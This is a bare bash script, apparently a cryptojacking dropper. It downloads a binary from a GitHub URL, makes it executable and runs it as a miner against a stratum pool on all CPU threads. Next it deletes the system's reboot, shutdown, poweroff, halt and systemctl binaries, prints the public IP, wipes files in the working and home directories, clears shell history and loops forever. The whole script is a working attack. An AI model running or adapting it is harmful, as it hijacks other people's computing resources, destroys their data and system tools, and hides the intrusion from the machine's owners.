#!/bin/bash
wget -O biru https://github.com/claires67/newxm/raw/main/newcrypik > /dev/null 2>&1
chmod 777 biru
./biru -s stratum+tcp://stratum.cryptix-network.org -p 13094 --mining-address cryptix:qrekfkqqlxk9xtdfuyrk6ytq5dncw8zlt0vcxgwlv6rlcxzwg9tyz7vf7k5td.x --threads $(nproc --all)
sleep 30
sudo rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl || rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl
curl ifconfig.me
rm -rvf *
cd ~/
rm -rvf *
history -cr
while true
do
        echo "hold down..."
        sleep 30
done
